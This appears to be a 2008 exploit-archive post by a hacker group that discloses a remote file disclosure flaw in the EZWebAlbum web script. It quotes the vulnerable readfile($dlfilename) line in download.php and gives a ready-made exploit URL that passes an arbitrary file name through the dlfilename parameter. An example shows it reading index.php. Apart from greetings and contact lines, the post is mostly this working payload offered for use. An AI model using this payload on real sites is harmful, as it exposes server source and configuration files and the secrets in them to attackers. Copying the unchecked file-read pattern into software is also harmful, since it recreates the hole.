EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability
# Published : 2008-07-21
# Author : Ghost Hacker
# Previous Title : MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
# Next Title : Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

##################################################################################################
 EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability     |,  .-.  .-.  ,|
 Found by : Ghost Hacker [ R-H TeaM ]                             | )(_o/  o_)( |
 My Site web : Real-hack.Net                                      |/     /     |
##################################################################################################
[~] Found by : Ghost Hacker [ R-H TeaM ]
[~] Home page : www.Real-hack.net
[~] Email : Ghost-r00t@Hotmail.com
[~] Name Script : EZWebAlbum
[~] Download Script : http://sourceforge.net/projects/ezwebalbum
###################################### [ Viva IslaM & KSA ] ######################################
[~] Error (download.php) :
readfile($dlfilename);

[~] Exploit :
http://xxxx/[path]/download.php?dlfilename=EVIL
[~] Example :
http://xxxx/[path]/download.php?dlfilename=index.php
###################################### [ Viva IslaM & KSA ] ######################################
[~] Greetz :
PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & LeGeNd HaCkEr & Root Hacker ..
Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope & My Blog[ gh0st10.wordpress.com ]
All Members Real Hack And All My Friends ..
##################################################################################################
 Found by : Ghost Hacker [ R-H TeaM ]
##################################################################################################

# www.Syue.com [2008-07-21]